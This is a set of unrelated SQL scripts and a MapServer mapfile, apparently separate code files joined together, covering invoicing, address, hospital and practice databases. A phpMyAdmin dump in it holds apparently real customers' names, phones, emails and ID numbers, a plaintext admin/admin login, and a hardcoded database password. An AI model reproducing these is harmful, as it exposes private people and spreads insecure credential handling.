AS neue_anzahl_osmadressen, te1.anzahl_osmadressen AS alte_anzahl_osmadressen, te2.theo_anzahl_adressen AS neue_theo_anzahl_adressen, te1.theo_anzahl_adressen AS alte_theo_anzahl_adressen, round(CAST(te2.theo_adressenabdeckung AS NUMERIC),1) AS neue_theo_adressenabdeckung, round(CAST(te1.theo_adressenabdeckung AS NUMERIC),1) AS alte_theo_adressenabdeckung, to_char(te2.tstamp, 'DD.MM.YYYY HH24:MI') AS neue_tstamp, to_char(te1.tstamp, 'DD.MM.YYYY HH24:MI') AS alte_tstamp, te2.polygon as polygon FROM theoeval201612 AS te2, theoeval201601 AS te1 WHERE te2.gemeinde_id = te1.gemeinde_id AND te2.land = te1.land AND te2.land = 'Bundesrepublik Deutschland';
INSERT INTO public.series_table( id, description, genres, name, rent_value, seasons, year) VALUES (1, 'An anthology series exploring a twisted, high-tech multiverse where humanitys greatest innovations and darkest instincts collide.', 'Drama, Sci-Fi, Thriller', 'Black Mirror', null, 5, 2011); INSERT INTO public.series_table( id, description, genres, name, rent_value, seasons, year) VALUES (2, 'An anthology series exploring a twisted, high-tech multiverse where humanitys greatest innovations and darkest instincts collide.', 'Action, Drama, Fantasy ', 'Ragnarokor', 14.90, 2, 2020); INSERT INTO public.series_table( id, description, genres, name, rent_value, seasons, year) VALUES (3, 'Inspired by the adventures of Arsène Lupin, gentleman thief Assane Diop sets out to avenge his father for an injustice inflicted by a wealthy family.', 'Action, Crime, Drama', 'Lupin', 19.90, 3, 2021);
-- Old script 761 was committed with wrong extension - reapplying here DELETE FROM AD_Message_Trl WHERE AD_Message_ID IN (53120, 53121); DELETE FROM AD_Message WHERE AD_Message_ID IN (53120, 53121); -- 11-dic-2010 9:42:17 COT -- Fix Msg.getMsg: NOT found: Clear INSERT INTO AD_Message (AD_Client_ID,AD_Message_ID,AD_Org_ID,Created,CreatedBy,EntityType,IsActive,MsgText,MsgType,Updated,UpdatedBy,Value) VALUES (0,53120,0,TO_DATE('2010-12-11 09:42:16','YYYY-MM-DD HH24:MI:SS'),100,'D','Y','c','I',TO_DATE('2010-12-11 09:42:16','YYYY-MM-DD HH24:MI:SS'),100,'Key_Clear') ; -- 11-dic-2010 9:42:17 COT INSERT INTO AD_Message_Trl (AD_Language,AD_Message_ID, MsgText,MsgTip, IsTranslated,AD_Client_ID,AD_Org_ID,Created,Createdby,Updated,UpdatedBy) SELECT l.AD_Language,t.AD_Message_ID, t.MsgText,t.MsgTip, 'N',t.AD_Client_ID,t.AD_Org_ID,t.Created,t.Createdby,t.Updated,t.UpdatedBy FROM AD_Language l, AD_Message t WHERE l.IsActive='Y' AND l.IsSystemLanguage='Y' AND l.IsBaseLanguage='N' AND t.AD_Message_ID=53120 AND NOT EXISTS (SELECT * FROM AD_Message_Trl tt WHERE tt.AD_Language=l.AD_Language AND tt.AD_Message_ID=t.AD_Message_ID) ; -- 11-dic-2010 9:42:37 COT INSERT INTO AD_Message (AD_Client_ID,AD_Message_ID,AD_Org_ID,Created,CreatedBy,EntityType,IsActive,MsgText,MsgType,Updated,UpdatedBy,Value) VALUES (0,53121,0,TO_DATE('2010-12-11 09:42:36','YYYY-MM-DD HH24:MI:SS'),100,'D','Y','c','I',TO_DATE('2010-12-11 09:42:36','YYYY-MM-DD HH24:MI:SS'),100,'Clear') ; -- 11-dic-2010 9:42:37 COT INSERT INTO AD_Message_Trl (AD_Language,AD_Message_ID, MsgText,MsgTip, IsTranslated,AD_Client_ID,AD_Org_ID,Created,Createdby,Updated,UpdatedBy) SELECT l.AD_Language,t.AD_Message_ID, t.MsgText,t.MsgTip, 'N',t.AD_Client_ID,t.AD_Org_ID,t.Created,t.Createdby,t.Updated,t.UpdatedBy FROM AD_Language l, AD_Message t WHERE l.IsActive='Y' AND l.IsSystemLanguage='Y' AND l.IsBaseLanguage='N' AND t.AD_Message_ID=53121 AND NOT EXISTS (SELECT * FROM AD_Message_Trl tt WHERE tt.AD_Language=l.AD_Language AND tt.AD_Message_ID=t.AD_Message_ID) ; -- 11-dic-2010 9:42:50 COT UPDATE AD_Message_Trl SET IsTranslated='Y', MsgText='Borrar',Updated=TO_DATE('2010-12-11 09:42:50','YYYY-MM-DD HH24:MI:SS'),UpdatedBy=100 WHERE AD_Message_ID=53121 AND AD_Language LIKE 'es_%' ; -- 11-dic-2010 9:45:13 COT UPDATE AD_Message_Trl SET IsTranslated='Y', MsgText='b',Updated=TO_DATE('2010-12-11 09:45:13','YYYY-MM-DD HH24:MI:SS'),UpdatedBy=100 WHERE AD_Message_ID=53120 AND AD_Language LIKE 'es_%' ;
use evoevent; update usuarios set email = "hehehe@gmail.com" where id=4; select * from eventos; select * from perfis; select * from usuarios; select * from requisicoes; select * from inscricoes; describe perfis; describe inscricoes; select * from eventos,inscricoes where eventos.data_hora_termino > now() and eventos.id = inscricoes.evento_id and inscricoes.perfil_id != 2;
-- phpMyAdmin SQL Dump -- version 4.7.9 -- https://www.phpmyadmin.net/ -- -- Servidor: 127.0.0.1:3306 -- Tiempo de generación: 07-02-2019 a las 22:14:13 -- Versión del servidor: 5.7.21 -- Versión de PHP: 5.6.35 SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO"; SET AUTOCOMMIT = 0; START TRANSACTION; SET time_zone = "+00:00"; /*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */; /*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */; /*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */; /*!40101 SET NAMES utf8mb4 */; -- -- Base de datos: `cotizaciones` -- -- -------------------------------------------------------- -- -- Estructura de tabla para la tabla `detallecotizacion` -- DROP TABLE IF EXISTS `detallecotizacion`; CREATE TABLE IF NOT EXISTS `detallecotizacion` ( `cotizacion` varchar(15) NOT NULL, `cantidad` int(10) NOT NULL, `producto` varchar(200) NOT NULL, `precio` decimal(10,2) NOT NULL ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- -- Volcado de datos para la tabla `detallecotizacion` -- INSERT INTO `detallecotizacion` (`cotizacion`, `cantidad`, `producto`, `precio`) VALUES ('COT_000001', 2, 'banner 3*3', '70.00'), ('COT_000002', 1, 'pintura para camion', '145.00'), ('COT_000002', 1, 'placas decorativas ', '9.00'), ('COT_000003', 1, 'pintura para camion', '145.00'), ('COT_000004', 1, 'pintura para camion', '145.00'), ('COT_000005', 1, 'ensalada de mango', '5.00'), ('COT_000005', 1, 'banner 3*3', '35.00'), ('COT_000005', 2, 'placas decorativas ', '18.00'); -- -------------------------------------------------------- -- -- Estructura de tabla para la tabla `detallefactura` -- DROP TABLE IF EXISTS `detallefactura`; CREATE TABLE IF NOT EXISTS `detallefactura` ( `fk_factura` varchar(20) NOT NULL, `fk_producto` int(11) NOT NULL, `descripcion` varchar(200) NOT NULL, `cantidad` int(11) NOT NULL, `precio` decimal(8,2) NOT NULL ) ENGINE=MyISAM DEFAULT CHARSET=latin1; -- -- Volcado de datos para la tabla `detallefactura` -- INSERT INTO `detallefactura` (`fk_factura`, `fk_producto`, `descripcion`, `cantidad`, `precio`) VALUES ('FAC_000001', 1, 'banner 3*3', 1, '35.00'), ('FAC_000001', 2, 'pintura para camion', 1, '145.00'), ('FAC_000001', 3, 'ensalada de mango', 1, '5.00'), ('FAC_000002', 1, 'placas decorativas ', 1, '9.00'), ('FAC_000002', 2, 'pintura para cuarto', 1, '25.00'), ('FAC_000003', 1, 'placas decorativas ', 1, '9.00'), ('FAC_000003', 2, 'pintura para cuarto', 1, '25.00'); -- -------------------------------------------------------- -- -- Estructura de tabla para la tabla `tbl_clients` -- DROP TABLE IF EXISTS `tbl_clients`; CREATE TABLE IF NOT EXISTS `tbl_clients` ( `clie_id` int(5) UNSIGNED ZEROFILL NOT NULL AUTO_INCREMENT, `clie_nombre` varchar(50) NOT NULL, `clie_nombre_comercial` varchar(50) NOT NULL, `clie_cedula` varchar(20) NOT NULL, `clie_correo` varchar(100) NOT NULL, `clie_direccion` varchar(200) NOT NULL, `clie_telefono` varchar(15) NOT NULL, PRIMARY KEY (`clie_id`), UNIQUE KEY `clie_telefono` (`clie_telefono`) ) ENGINE=InnoDB AUTO_INCREMENT=15 DEFAULT CHARSET=latin1; -- -- Volcado de datos para la tabla `tbl_clients` -- INSERT INTO `tbl_clients` (`clie_id`, `clie_nombre`, `clie_nombre_comercial`, `clie_cedula`, `clie_correo`, `clie_direccion`, `clie_telefono`) VALUES (00005, 'kevin rojas', 'afius tech', '88162061', 'kevin_rojas30@hotmail.com', 'tocumen', '69250983'), (00006, 'fermin rojas', 'generico', '86242064', 'ferrojas@hotmail.com', 'mano de piedra', '2751803'), (00007, 'elsa arroyo', 'others', '3316366', '', 'san miguelito', ''), (00010, 'simona herrera', 'casa', '3-369-78', '', 'roberto duran', '2751234'), (00012, 'melvin rojas', 'pepelera', '8-816-2062', '', 'villas de altamira', '64656996'), (00013, 'jostin rojas', 'casa', '8-820-5696', '', 'buena vista', '65686741'), (00014, 'juan', 'lourdes ikebana', '8-234-5678', 'juanikebana@gmail.com', 'tumba muerto', '234-6678'); -- -------------------------------------------------------- -- -- Estructura de tabla para la tabla `tbl_cotizaciones` -- DROP TABLE IF EXISTS `tbl_cotizaciones`; CREATE TABLE IF NOT EXISTS `tbl_cotizaciones` ( `id_cotizacion` varchar(10) NOT NULL, `cliente` varchar(50) NOT NULL, `empresa` varchar(200) DEFAULT NULL, `telefono` varchar(50) NOT NULL, `correo` varchar(200) DEFAULT NULL, `fecha_cotizacion` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP, `subtotal` varchar(20) NOT NULL, `impuesto` varchar(20) NOT NULL, `monto` decimal(10,2) NOT NULL, PRIMARY KEY (`id_cotizacion`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- -- Volcado de datos para la tabla `tbl_cotizaciones` -- INSERT INTO `tbl_cotizaciones` (`id_cotizacion`, `cliente`, `empresa`, `telefono`, `correo`, `fecha_cotizacion`, `subtotal`, `impuesto`, `monto`) VALUES ('COT_000001', 'kevin rojas', 'afius tech', '69250983', 'kevin_rojas30@hotmail.com', '2019-01-06 17:13:07', '70.00', '4.90', '70.00'), ('COT_000002', 'melvin rojas', 'pepelera', '64656996', '', '2019-02-06 17:19:04', '154.00', '10.78', '164.78'), ('COT_000003', 'kevin rojas', 'afius tech', '69250983', 'kevin_rojas30@hotmail.com', '2019-02-06 17:21:29', '145.00', '10.15', '145.00'), ('COT_000004', 'melvin rojas', 'pepelera', '64656996', '', '2019-02-06 17:26:44', '145.00', '10.15', '145.00'), ('COT_000005', 'melvin rojas', 'pepelera', '64656996', '', '2019-02-07 21:29:00', '58.00', '4.06', '62.06'); -- -- Disparadores `tbl_cotizaciones` -- DROP TRIGGER IF EXISTS `cotizaciones_ad_trigger`; DELIMITER $$ CREATE TRIGGER `cotizaciones_ad_trigger` AFTER DELETE ON `tbl_cotizaciones` FOR EACH ROW BEGIN delete from detallecotizacion where cotizacion = old.id_cotizacion ; END $$ DELIMITER ; -- -------------------------------------------------------- -- -- Estructura de tabla para la tabla `tbl_empresas` -- DROP TABLE IF EXISTS `tbl_empresas`; CREATE TABLE IF NOT EXISTS `tbl_empresas` ( `id_empresa` varchar(10) NOT NULL, `nombre_empresa` varchar(20) NOT NULL, PRIMARY KEY (`id_empresa`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1 COMMENT='registro de empresas'; -- -- Volcado de datos para la tabla `tbl_empresas` -- INSERT INTO `tbl_empresas` (`id_empresa`, `nombre_empresa`) VALUES ('emp0001', 'Tesla motors'), ('emp0002', 'Solar city'), ('emp0003', 'FullAI'); -- -------------------------------------------------------- -- -- Estructura de tabla para la tabla `tbl_factura` -- DROP TABLE IF EXISTS `tbl_factura`; CREATE TABLE IF NOT EXISTS `tbl_factura` ( `id_factura` varchar(50) NOT NULL, `fecha` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP, `fk_cotizacion` varchar(50) DEFAULT NULL, `cliente` varchar(200) NOT NULL, `empresa` varchar(200) DEFAULT NULL, `telefono` varchar(50) NOT NULL, `correo` varchar(200) DEFAULT NULL, `subtotal` varchar(10) NOT NULL, `impuesto` varchar(10) NOT NULL, `monto` decimal(10,2) NOT NULL, PRIMARY KEY (`id_factura`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1; -- -- Volcado de datos para la tabla `tbl_factura` -- INSERT INTO `tbl_factura` (`id_factura`, `fecha`, `fk_cotizacion`, `cliente`, `empresa`, `telefono`, `correo`, `subtotal`, `impuesto`, `monto`) VALUES ('FAC_000001', '2019-01-24 05:32:26', 'COT_0001', 'melvin rojas', 'pepelera', '64656996', '', '185.00', '12.95', '197.95'), ('FAC_000002', '2019-01-24 05:35:17', 'COT_0003', 'kevin rojas', 'afius tech', '69250983', 'kevin_rojas30@hotmail.com', '34.00', '2.38', '36.38'), ('FAC_000003', '2019-01-24 05:38:41', 'COT_0003', 'kevin rojas', 'afius tech', '69250983', 'kevin_rojas30@hotmail.com', '34.00', '2.38', '36.38'); -- -------------------------------------------------------- -- -- Estructura de tabla para la tabla `tbl_productos` -- DROP TABLE IF EXISTS `tbl_productos`; CREATE TABLE IF NOT EXISTS `tbl_productos` ( `id_products` int(6) NOT NULL AUTO_INCREMENT, `descripcion` varchar(200) NOT NULL, `precio` decimal(8,2) NOT NULL, `prod_fecha` date NOT NULL, PRIMARY KEY (`id_products`) ) ENGINE=InnoDB AUTO_INCREMENT=20 DEFAULT CHARSET=latin1; -- -- Volcado de datos para la tabla `tbl_productos` -- INSERT INTO `tbl_productos` (`id_products`, `descripcion`, `precio`, `prod_fecha`) VALUES (13, 'placas decorativas ', '9.00', '2016-10-22'), (14, 'banner 3*3', '35.00', '2016-10-22'), (15, 'pintura para cuarto', '25.00', '2016-10-22'), (16, 'pintura para camion', '145.00', '2016-10-22'), (17, 'ensalada de mango', '5.00', '2019-01-07'), (19, 'articulos varios', '13.00', '2019-02-07'); -- -------------------------------------------------------- -- -- Estructura de tabla para la tabla `tbl_usuarios` -- DROP TABLE IF EXISTS `tbl_usuarios`; CREATE TABLE IF NOT EXISTS `tbl_usuarios` ( `id_usuario` int(11) NOT NULL AUTO_INCREMENT, `id_rol` int(11) NOT NULL, `correo_electronico` varchar(255) NOT NULL, `clave` varchar(255) NOT NULL, `nombre` varchar(255) NOT NULL, `apellido` varchar(255) NOT NULL, `estado` int(11) NOT NULL, `mostrar` int(11) NOT NULL DEFAULT '1', PRIMARY KEY (`id_usuario`) ) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=latin1; -- -- Volcado de datos para la tabla `tbl_usuarios` -- INSERT INTO `tbl_usuarios` (`id_usuario`, `id_rol`, `correo_electronico`, `clave`, `nombre`, `apellido`, `estado`, `mostrar`) VALUES (2, 2, 'admin@hotmail.com', 'admin', 'kevin', 'Rojas', 1, 1); COMMIT; /*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */; /*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */; /*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
INSERT INTO company(id, creation_date,name) VALUES (1, now(), 'Mari Ruas Cabeleireira'); INSERT INTO branch_company( id, creation_date, description, company_id) VALUES (1, now(), 'Unidade de Lagoa Vermelha', 1); INSERT INTO cashier(id, balance, description, branch_company_id) VALUES (1, 0, 'Caixa matriz', 1); INSERT INTO user_branch( login, password, type) VALUES ('admin', '9B6B447FC336D4F7046BF40823859E32DC0E0BC6156FD0A965E8A061BFE5C28F', 'admin');
-- テーブル結合 SELECT 日付, 名前 AS 費目, メモ FROM 家計簿 JOIN 費目 ON 家計簿.費目ID = 費目.ID -- 練習問題 -- 8-2-1 SELECT 社員番号, S.名前 AS 名前, B.名前 AS 部署名 FROM 社員 AS S JOIN 部署 AS B ON S.部署ID = B.部署ID -- 8-2-2 SELECT S1.社員番号, S1.名前 AS 名前, S2.名前 AS 上司名 FROM 社員 AS S1 LEFT JOIN 社員 AS S2 ON S1.上司ID = S2.社員番号 -- 8-2-3 SELECT 社員番号, S.名前 AS 名前, B.名前 AS 部署名, C.名前 AS 勤務地 FROM 社員 AS S JOIN 部署 AS B ON S.部署ID = B.ID JOIN 支店 AS C ON S.勤務地ID = C.支店ID -- 8-2-4 SELECT 支店ID AS 支店コード, K.名前 AS 支店名, S.名前 AS 支店長名, T.社員数 FROM 支店 AS K JOIN 社員 AS S ON K.支店長ID = S.社員番号 JOIN ( SELECT COUNT(*) AS 社員数, 勤務地ID FROM 社員 GROUP BY 勤務地ID) AS T ON K.支店ID = T.勤務地ID -- 8-2-5 SELECT S1.社員番号 AS 社員番号, S1.名前 AS 名前, K1.名前 AS 本人勤務地, K2.名前 AS 上司勤務地 FROM 社員 AS S1 JOIN 社員 AS S2 ON S1.上司ID = S2.社員番号 AND S1.勤務地ID <> S2.勤務地ID JOIN 支店 AS K1 ON S1.勤務地ID = K1.支店ID JOIN 支店 AS K2 ON S2.勤務地ID = K2.支店ID
LAYER GROUP "default" STATUS ON MINSCALEDENOM 325008 MAXSCALEDENOM 650016 TYPE LINE NAME "aeroways10" CONNECTIONTYPE postgis CONNECTION "host=localhost dbname=osm user=osm password=osm port=5432" DATA "way from (select way, osm_id, aeroway from planet_osm_line) as foo using unique osm_id using srid=900913" CLASSITEM "aeroway" CLASS EXPRESSION "runway" STYLE COLOR 180 180 180 WIDTH 1 LINECAP BUTT LINEJOIN MITER END STYLE COLOR 80 80 80 WIDTH 0 PATTERN 2 2 END LINECAP BUTT END END CLASS EXPRESSION "taxiway" STYLE COLOR 180 180 180 WIDTH 0.2 END END END LAYER GROUP "default" STATUS ON MINSCALEDENOM 162504 MAXSCALEDENOM 325008 TYPE LINE NAME "aeroways11" CONNECTIONTYPE postgis CONNECTION "host=localhost dbname=osm user=osm password=osm port=5432" DATA "way from (select way, osm_id, aeroway from planet_osm_line) as foo using unique osm_id using srid=900913" CLASSITEM "aeroway" CLASS EXPRESSION "runway" STYLE COLOR 180 180 180 WIDTH 2 LINECAP BUTT LINEJOIN MITER END STYLE COLOR 80 80 80 WIDTH 0 PATTERN 2 2 END LINECAP BUTT END END CLASS EXPRESSION "taxiway" STYLE COLOR 180 180 180 WIDTH 0.2 END END END LAYER GROUP "default" STATUS ON MINSCALEDENOM 81252 MAXSCALEDENOM 162504 TYPE LINE NAME "aeroways12" CONNECTIONTYPE postgis CONNECTION "host=localhost dbname=osm user=osm password=osm port=5432" DATA "way from (select way, osm_id, aeroway from planet_osm_line) as foo using unique osm_id using srid=900913" CLASSITEM "aeroway" CLASS EXPRESSION "runway" STYLE COLOR 180 180 180 WIDTH 3 LINECAP BUTT LINEJOIN MITER END STYLE COLOR 80 80 80 WIDTH 0 PATTERN 2 2 END LINECAP BUTT END END CLASS EXPRESSION "taxiway" STYLE COLOR 180 180 180 WIDTH 0.2 END END END LAYER GROUP "default" STATUS ON MINSCALEDENOM 40626 MAXSCALEDENOM 81252 TYPE LINE NAME "aeroways13" CONNECTIONTYPE postgis CONNECTION "host=localhost dbname=osm user=osm password=osm port=5432" DATA "way from (select way, osm_id, aeroway from planet_osm_line) as foo using unique osm_id using srid=900913" CLASSITEM "aeroway" CLASS EXPRESSION "runway" STYLE COLOR 180 180 180 WIDTH 5 LINECAP BUTT LINEJOIN MITER END STYLE COLOR 80 80 80 WIDTH 0 PATTERN 2 2 END LINECAP BUTT END END CLASS EXPRESSION "taxiway" STYLE COLOR 180 180 180 WIDTH 1 END END END LAYER GROUP "default" STATUS ON MINSCALEDENOM 20313 MAXSCALEDENOM 40626 TYPE LINE NAME "aeroways14" CONNECTIONTYPE postgis CONNECTION "host=localhost dbname=osm user=osm password=osm port=5432" DATA "way from (select way, osm_id, aeroway from planet_osm_line) as foo using unique osm_id using srid=900913" CLASSITEM "aeroway" CLASS EXPRESSION "runway" STYLE COLOR 180 180 180 WIDTH 7 LINECAP BUTT LINEJOIN MITER END STYLE COLOR 80 80 80 WIDTH 0 PATTERN 2 2 END LINECAP BUTT END END CLASS EXPRESSION "taxiway" STYLE COLOR 180 180 180 WIDTH 1.5 END END END LAYER GROUP "default" STATUS ON MINSCALEDENOM 10156 MAXSCALEDENOM 20313 TYPE LINE NAME "aeroways15" CONNECTIONTYPE postgis CONNECTION "host=localhost dbname=osm user=osm password=osm port=5432" DATA "way from (select way, osm_id, aeroway from planet_osm_line) as foo using unique osm_id using srid=900913" CLASSITEM "aeroway" CLASS EXPRESSION "runway" STYLE COLOR 180 180 180 WIDTH 11 LINECAP BUTT LINEJOIN MITER END STYLE COLOR 80 80 80 WIDTH 1 PATTERN 2 2 END LINECAP BUTT END END CLASS EXPRESSION "taxiway" STYLE COLOR 180 180 180 WIDTH 2 END END END LAYER GROUP "default" STATUS ON MINSCALEDENOM 5078 MAXSCALEDENOM 10156 TYPE LINE NAME "aeroways16" CONNECTIONTYPE postgis CONNECTION "host=localhost dbname=osm user=osm password=osm port=5432" DATA "way from (select way, osm_id, aeroway from planet_osm_line) as foo using unique osm_id using srid=900913" CLASSITEM "aeroway" CLASS EXPRESSION "runway" STYLE COLOR 180 180 180 WIDTH 15 LINECAP BUTT LINEJOIN MITER END STYLE COLOR 80 80 80 WIDTH 1 PATTERN 2 2 END LINECAP BUTT END END CLASS EXPRESSION "taxiway" STYLE COLOR 180 180 180 WIDTH 3 END END END LAYER GROUP "default" STATUS ON MINSCALEDENOM 2539 MAXSCALEDENOM 5078 TYPE LINE NAME "aeroways17" CONNECTIONTYPE postgis CONNECTION "host=localhost dbname=osm user=osm password=osm port=5432" DATA "way from (select way, osm_id, aeroway from planet_osm_line) as foo using unique osm_id using srid=900913" CLASSITEM "aeroway" CLASS EXPRESSION "runway" STYLE COLOR 180 180 180 WIDTH 19 LINECAP BUTT LINEJOIN MITER END STYLE COLOR 80 80 80 WIDTH 1 PATTERN 2 2 END LINECAP BUTT END END CLASS EXPRESSION "taxiway" STYLE COLOR 180 180 180 WIDTH 4 END END END LAYER GROUP "default" STATUS ON MINSCALEDENOM 0 MAXSCALEDENOM 2539 TYPE LINE NAME "aeroways18" CONNECTIONTYPE postgis CONNECTION "host=localhost dbname=osm user=osm password=osm port=5432" DATA "way from (select way, osm_id, aeroway from planet_osm_line) as foo using unique osm_id using srid=900913" CLASSITEM "aeroway" CLASS EXPRESSION "runway" STYLE COLOR 180 180 180 WIDTH 23 LINECAP BUTT LINEJOIN MITER END STYLE COLOR 80 80 80 WIDTH 1 PATTERN 2 2 END LINECAP BUTT END END CLASS EXPRESSION "taxiway" STYLE COLOR 180 180 180 WIDTH 5 END END END
/*==============================================================*/ /* DBMS name: MySQL 5.0 */ /* Created on: 2017/12/15 15:48:06 */ /*==============================================================*/ drop table if exists admin; drop table if exists "case"; drop table if exists case_log; drop table if exists case_new; drop table if exists department; drop table if exists disease; drop table if exists doctor; drop table if exists sufferer; drop table if exists template; /*==============================================================*/ /* Table: admin */ /*==============================================================*/ create table admin ( id varchar(64) not null, admin_name varchar(64), admin_account varchar(64), admin_pwd varchar(64), primary key (id) ); /*==============================================================*/ /* Table: "case" */ /*==============================================================*/ create table "case" ( id varchar(64) not null, suf_id varchar(64), doc_id varchar(64), dep_id varchar(64), tem_id varchar(64), des_id varchar(64), hos_no varchar(64), hos_data date, diagnose_sug text, process text, deal_sug text, diagnose_result text, create_time datetime, primary key (id) ); /*==============================================================*/ /* Table: case_log */ /*==============================================================*/ create table case_log ( id varchar(64) not null, case_id varchar(64), log_case_id varchar(64), log_remark text, upate_time datetime, primary key (id) ); /*==============================================================*/ /* Table: case_new */ /*==============================================================*/ create table case_new ( id varchar(64) not null, case_id char(10), suf_id varchar(64), doc_id varchar(64), dep_id varchar(64), tem_id varchar(64), des_id varchar(64), hos_no varchar(64), hos_data date, diagnose_sug text, process text, deal_sug text, diagnose_result text, create_time datetime, update_time datetime, primary key (id) ); /*==============================================================*/ /* Table: department */ /*==============================================================*/ create table department ( id varchar(64) not null, dep_name varchar(64), dep_remark varchar(512), primary key (id) ); /*==============================================================*/ /* Table: disease */ /*==============================================================*/ create table disease ( id varchar(64) not null, des_name varchar(64), des_remark text, primary key (id) ); /*==============================================================*/ /* Table: doctor */ /*==============================================================*/ create table doctor ( id varchar(64) not null, doc_name varchar(64), depart_id varchar(64), doc_account varchar(64), doc_pwd varchar(64), doc_age int, doc_title varchar(64), doc_sex varchar(64), primary key (id) ); /*==============================================================*/ /* Table: sufferer */ /*==============================================================*/ create table sufferer ( id varchar(64) not null, suf_name varchar(64), suf_sex varchar(64), suf_age int, suf_his text, suf_card varchar(64), doc_id varchar(64), suf_address varchar(512), suf_phone varchar(64), suf_nation varchar(64), suf_native varchar(64), primary key (id) ); /*==============================================================*/ /* Table: template */ /*==============================================================*/ create table template ( id varchar(46) not null, dep_id varchar(46), tem_name varchar(46), tem_url varchar(512), primary key (id) );
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */; /*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */; /*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */; /*!40101 SET NAMES utf8 */; /*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */; /*!40103 SET TIME_ZONE='+00:00' */; /*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */; /*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */; /*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */; /*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */; -- -- Table structure for table `addresses` -- DROP TABLE IF EXISTS `addresses`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `addresses` ( `id` int(11) unsigned NOT NULL AUTO_INCREMENT, `city_id` smallint(6) unsigned NOT NULL, `city_part_id` smallint(6) unsigned NOT NULL, `street_id` smallint(6) unsigned DEFAULT NULL, `postcode_id` smallint(6) NOT NULL, `evidence` tinyint(1) NOT NULL DEFAULT '0', `number` smallint(6) unsigned NOT NULL, `orient` smallint(6) unsigned DEFAULT NULL, `letter` varchar(1) DEFAULT NULL, PRIMARY KEY (`id`), KEY `index_addresses_on_city_id` (`city_id`), KEY `index_addresses_on_city_part_id` (`city_part_id`), KEY `index_addresses_on_street_id` (`street_id`), KEY `index_addresses_on_postcode_id` (`postcode_id`), KEY `index_addresses_on_number` (`number`), KEY `index_addresses_on_orient` (`orient`) ) ENGINE=MyISAM AUTO_INCREMENT=77684080 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Table structure for table `cities` -- DROP TABLE IF EXISTS `cities`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `cities` ( `id` bigint(20) NOT NULL AUTO_INCREMENT, `name` varchar(255) COLLATE utf8_czech_ci NOT NULL, `created_at` datetime NOT NULL, `updated_at` datetime NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB AUTO_INCREMENT=5346 DEFAULT CHARSET=utf8 COLLATE=utf8_czech_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Table structure for table `city_parts` -- DROP TABLE IF EXISTS `city_parts`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `city_parts` ( `id` bigint(20) NOT NULL AUTO_INCREMENT, `name` varchar(255) COLLATE utf8_czech_ci NOT NULL, `created_at` datetime NOT NULL, `updated_at` datetime NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB AUTO_INCREMENT=10917 DEFAULT CHARSET=utf8 COLLATE=utf8_czech_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Table structure for table `coords` -- DROP TABLE IF EXISTS `coords`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `coords` ( `id` bigint(20) NOT NULL AUTO_INCREMENT, `x` decimal(10,2) DEFAULT NULL, `y` decimal(10,2) DEFAULT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB AUTO_INCREMENT=77684080 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Table structure for table `postcodes` -- DROP TABLE IF EXISTS `postcodes`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `postcodes` ( `id` bigint(20) NOT NULL AUTO_INCREMENT, `number` int(11) NOT NULL, `created_at` datetime NOT NULL, `updated_at` datetime NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB AUTO_INCREMENT=2673 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Table structure for table `streets` -- DROP TABLE IF EXISTS `streets`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `streets` ( `id` bigint(20) NOT NULL AUTO_INCREMENT, `name` varchar(255) COLLATE utf8_czech_ci NOT NULL, `created_at` datetime NOT NULL, `updated_at` datetime NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB AUTO_INCREMENT=27108 DEFAULT CHARSET=utf8 COLLATE=utf8_czech_ci; /*!40101 SET character_set_client = @saved_cs_client */; /*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */; /*!40101 SET SQL_MODE=@OLD_SQL_MODE */; /*!40014 